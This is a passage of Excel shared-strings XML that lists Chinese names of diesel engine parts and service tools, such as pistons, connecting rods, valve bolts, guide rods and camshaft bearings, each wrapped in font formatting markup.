        <charset val="134"/>
      </rPr>
      <t>曲拐箱油温检测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡环的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌，主轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲拐箱盖，防爆门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导销抽取器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，排气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>档圈，燃油阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，喷油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，燃气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰，喷油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>档圈，起动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，起动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>档圈，安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>档圈，示功器孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量规</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块抽取器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块（工具）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 2/2</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块，附加质量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导管，活塞杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞（间隙）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞，整体式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞（防火环）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬垫？活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬垫？油缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油缸的法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叶片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆，弹簧套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶形衬套毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶形衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀桥</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>级油缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>级油缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油缸，整体式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰，螺塞阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>档板底座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀头研磨杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推杆顶块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推杆底块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞，泄压阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>间隙消除器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂，进气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂，排气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，滚轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>斜齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦，凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮，曲轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承，驱动轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮，驱动轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链张紧器偏心轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一半</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>样品部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导入板支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑，传感器箱体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑，传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>详细图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电线，单核</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>怛温器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖的垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，吊装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
